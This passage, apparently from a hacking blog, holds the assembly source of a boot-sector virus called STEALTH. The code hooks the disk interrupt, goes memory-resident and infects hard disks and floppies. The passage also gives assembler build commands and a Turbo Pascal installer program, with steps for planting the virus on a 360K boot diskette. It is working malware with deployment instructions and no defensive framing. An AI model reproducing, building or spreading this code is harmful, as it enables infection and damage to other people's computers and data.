       push    ax         mov     bx,OFFSET BOOT_START         mov     dl,al                           ;this is the drive to write to         mov     dh,0                            ;head 0         mov     ch,0                            ;track 0         mov     cl,1                            ;sector 1         mov     al,1                            ;read 1 sector         mov     ah,3                            ;BIOS write function         pushf         call    DWORD PTR [OLD_13H]             ;(int 13H)         pop     ax         ret
;******************************************************************************* ;Determine whether the boot sector in SCRATCHBUF is the viral boot sector.
;Returns Z if it is, NZ if not. The first 30 bytes of code, starting at BOOT,
;are checked to see if they are identical. If so, it must be the viral boot
;sector. It is assumed that es and ds are properly set to this segment when ;this is called.
IS_VBS:         push    si                              ;save these         push    di         cld         mov     di,OFFSET BOOT                  ;set up for a compare ;       mov     si,OFFSET SCRATCHBUF + (OFFSET BOOT - OFFSET BOOT_START)         mov     si,OFFSET SB_BOOT               ;required instead of ^ for A86
       mov     cx,15         repz    cmpsw                           ;compare 30 bytes         pop     di                              ;restore these         pop     si         ret                                     ;and return with z properly set
;* A SCRATCH PAD BUFFER FOR DISK READS AND WRITES                              * ;*******************************************************************************
       ORG     7A00H
SCRATCHBUF:                                     ;a total of 512 bytes
       DB      3 dup (0)
SB_BOOT_DATA:                                   ;with references to correspond
       DB      32H dup (0)                     ;to various areas in the boot
SB_DR_FLAG:                                     ;sector at 7C00
       DB      0                               ;these are only needed by A86
SB_BOOT:                                        ;tasm and masm will let you
       DB      458 dup (0)                     ;just do “db 512 dup (0)”
;* THIS IS THE REPLACEMENT (VIRAL) BOOT SECTOR                                 *
;*******************************************************************************         ORG     7C00H                           ;Starting location for boot sec
BOOT_START:         jmp     SHORT BOOT                      ;jump over data area         db      090H                            ;an extra byte for near jump
BOOT_DATA:         db      32H dup (?)                     ;data area and default dbt                                                 ;(copied from orig boot sector)
DR_FLAG:DB      0                               ;Drive type flag, 0=360K Floppy
                                               ;                 1=1.2M Floppy
                                               ;                 2=720K Floppy
                                               ;                 3=1.4M Floppy
                                               ;                 80H=Hard Disk
;The boot sector code starts here BOOT:         cli                                     ;interrupts off         xor     ax,ax         mov     ss,ax         mov     ds,ax         mov     es,ax                           ;set up segment registers         mov     sp,OFFSET BOOT_START            ;and stack pointer         sti
       mov     cl,6                            ;prep to convert kb’s to seg         mov     ax,[MEMSIZE]                    ;get size of memory available         shl     ax,cl                           ;convert KBytes into a segment         sub     ax,7E0H                         ;subtract enough so this code         mov     es,ax                           ;will have the right offset to         sub     [MEMSIZE],4                     ;go memory resident in high ram
GO_RELOC:         mov     si,OFFSET BOOT_START            ;set up ds:si and es:di in order         mov     di,si                           ;to relocate this code         mov     cx,256                          ;to high memory         rep     movsw                           ;and go move this sector         push    es         mov     ax,OFFSET RELOC
       push    ax                              ;push new far @RELOC onto stack         retf                                    ;and go there with retf
RELOC:                                          ;now we’re in high memory         push    es                              ;so let’s install the virus         pop     ds         nop         mov     bx,OFFSET STEALTH               ;set up buffer to read virus         mov     al,BYTE PTR [DR_FLAG]           ;drive number         cmp     al,0                            ;Load from proper drive type         jz      LOAD_360         cmp     al,1         jz      LOAD_12M         cmp     al,2         jz      LOAD_720         cmp     al,3         jz      LOAD_14M                        ;if none of the above,
                                               ;then it’s a hard disk
LOAD_HARD:                                      ;load virus from hard disk         mov     dx,80H                          ;hard drive 80H, head 0,         mov     ch,0                            ;track 0,         mov     cl,2                            ;start at sector 2         jmp     SHORT LOAD1
LOAD_360:                                       ;load virus from 360 K floppy         mov     ch,39                           ;track 39         mov     cl,4                            ;start at sector 4         jmp     SHORT LOAD
LOAD_12M:                                       ;load virus from 1.2 Meg floppy         mov     ch,79                           ;track 80
       mov     cl,10                           ;start at sector 10         jmp     SHORT LOAD
LOAD_720:                                       ;load virus from 720K floppy         mov     ch,79                           ;track 79         mov     cl,4                            ;start at sector 4         jmp     SHORT LOAD                      ;go do it
LOAD_14M:                                       ;load from 1.44 Meg floppy         mov     ch,79                           ;track 79         mov     cl,13                           ;start at sector 13 ;       jmp     SHORT LOAD                      ;go do it
LOAD:   mov     dx,100H                         ;disk 0, head 1 LOAD1:  mov     ax,206H                         ;read 6 sectors         int     13H                             ;call BIOS to read it         jc      LOAD1                           ;try again if it fails
MOVE_OLD_BS:         xor     ax,ax                           ;now move old boot sector into         mov     es,ax                           ;low memory         mov     si,OFFSET SCRATCHBUF            ;at 0000:7C00         mov     di,OFFSET BOOT_START         mov     cx,256         rep     movsw
SET_SEGMENTS:                                   ;change segments around a bit         cli         mov     ax,cs         mov     ss,ax         mov     sp,OFFSET STEALTH               ;set up the stack for the virus         push    cs                              ;and also the es register         pop     es
INSTALL_INT13H:                                 ;now hook the Disk BIOS int         xor     ax,ax         mov     ds,ax         mov     si,13H*4                        ;save the old int 13H vector         mov     di,OFFSET OLD_13H         movsw         movsw         mov     ax,OFFSET INT_13H               ;and set up new interrupt 13H         mov     bx,13H*4                        ;which everybody will have to         mov     ds:[bx],ax                      ;use from now on         mov     ax,es         mov     ds:[bx+2],ax         sti
CHECK_DRIVE:         push    cs                              ;set ds to point here now         pop     ds
       cmp     BYTE PTR [DR_FLAG],80H          ;if booting from a hard drive,         jz      DONE                            ;nothing else needed at boot
FLOPPY_DISK:                                    ;if loading from a floppy drive,         call    IS_HARD_THERE                   ;see if a hard disk exists here         jz      DONE                            ;no hard disk, all done booting         mov     al,80H                          ;else load boot sector from C:         call    GET_BOOT_SEC                    ;into SCRATCHBUF         call    IS_VBS                          ;and see if C: is infected         jz      DONE                            ;yes, all done booting         call    INFECT_HARD                     ;else go infect hard drive C:
       mov     si,OFFSET PART                  ;clean partition data out of         mov     di,OFFSET PART+1                ;memory image of boot sector         mov     cx,3FH                          ;so it doesn’t get spread to         mov     BYTE PTR [si],0                 ;floppies when we infect them         rep     movsb
       xor     ax,ax                           ;now go execute old boot sector         push    ax                              ;at 0000:7C00         mov     ax,OFFSET BOOT_START         push    ax         retf
       ORG     7DBEH
PART:   DB      40H dup (?)                     ;partition table goes here
       ORG     7DFEH
       DB      55H,0AAH                        ;boot sector ID goes here ENDCODE:                                        ;label for the end of boot sec
       END     START
To compile STEALTH using MASM, generate a file STEALTH.COM with the following commands:
masm stealth; link stealth; exe2bin stealth ren stealth.bin
To compile with TASM, execute the following steps:
tasm stealth; tlink /t stealth;
Finally, to compile with A86, just type
A86 stealth.asm
Once you have created STEALTH.COM, you must get it into the right place on disk, which is not too easy without a special program. The following Turbo Pascal program, PUT_360, uses the file STEALTH.COM to put the STEALTH virus on a 360 kilobyte diskette. It formats the extra track required, and then moves the original boot sector, puts the main body of the virus in place, and puts the viral boot sector in Track 0, Head 0, Sector 1.
program put_360;     {This program puts the stealth virus STEALTH.COM on a   }                      {360K floppy diskette.                                  } uses dos;
var   disk_buffer      :array[0..5119] of byte;  {Data area to read virus into}   boot             :array[0..511] of byte;   {Data area to read boot sec into}   virus            :file;                    {Virus code file variable}   j                :integer;
{This function executes a BIOS Disk Access (int 13H) call.} function biosdisk(cmd,drive,head,track,sector,nsects:integer;                   buffer:pointer):byte; var   regs             :registers; begin   regs.AH:=cmd;                              {ah = function number}   regs.DL:=drive;                            {dl = drive number}   regs.DH:=head;                             {dh = head number}   regs.CH:=track;                            {ch = track number}   regs.CL:=sector;                           {cl = sector number}   regs.AL:=nsects;                           {al = # of sectors to operate on}   regs.ES:=seg(buffer^);                     {es:bx = data buffer}   regs.BX:=ofs(buffer^);   intr($13,regs);                            {Execute the interrupt}   biosdisk:=regs.flags and 1;                {Return code in ah} end;
begin   if biosdisk(2,0,0,0,1,1 ,@boot)<>0 then        {Read original boot sector}     writeln(’Couldn’’t read original boot sector!’);   if biosdisk(3,0,1,39,9,1,@boot)<>0 then        {Put it @ Trk 39, Hd 1, Sec 9}     writeln(’Couldn’’t write original boot sector!’);   assign(virus,’STEALTH.COM’);                   {Open the virus code file}   reset(virus,256);
 seek(virus,$6F);                               {Position fp to start of code}   BlockRead(virus,disk_buffer,10);               {Read 5 sectors to ram}   for j:=1 to 5 do     if biosdisk(3,0,1,39,3+j,1,@disk_buffer[512*(j-1)])<>0 then {Write it}       writeln(’Couldn’’t write stealth routines to disk! ’,j);
 seek(virus,$7B);                               {Position fp to viral boot sec}   BlockRead(virus,disk_buffer,2);                {Read it}   move(boot[3],disk_buffer[3],$32);              {Move orig boot data into it}   if biosdisk(3,0,0,0,1,1,@disk_buffer)<>0 then  {And make it the new boot sec}     writeln(’Couldn’’t write viral boot sector to disk!’);   close(virus);   if biosdisk(2,0,0,0,3,1,@disk_buffer)<>0 then     writeln(’Couldn’’t read FAT!’);   disk_buffer[$11]:=$70;   disk_buffer[$12]:=$FF;   disk_buffer[$13]:=$F7;   disk_buffer[$14]:=$7F;   disk_buffer[$15]:=$FF;   if biosdisk(3,0,0,0,3,1,@disk_buffer)<>0 then     writeln(’Couldn’’t write FAT1!’);   if biosdisk(3,0,0,0,5,1,@disk_buffer)<>0 then     writeln(’Couldn’’t write FAT2!’); end.
Compile this program with the command line “tpc put_360" using the Turbo Pascal command line compiler. To put STEALTH on a disk, format a 360 kilobyte floppy disk (using the /s option to make it a boot disk) and then run PUT_360 in the same directory as STEALTH.COM. The program disk has PUT programs for other formats, or you can modify PUT_360 to do it.

About The Author
Hasan Shaikh is the founder and admin of ShmHack, a popular blog dedicated for Learners,Geeks and Bloggers. He is currently 19 years old and loves to post articles related to blogging,SEO,adsense,hacking,security,social medias,computer and android. Find more about him...

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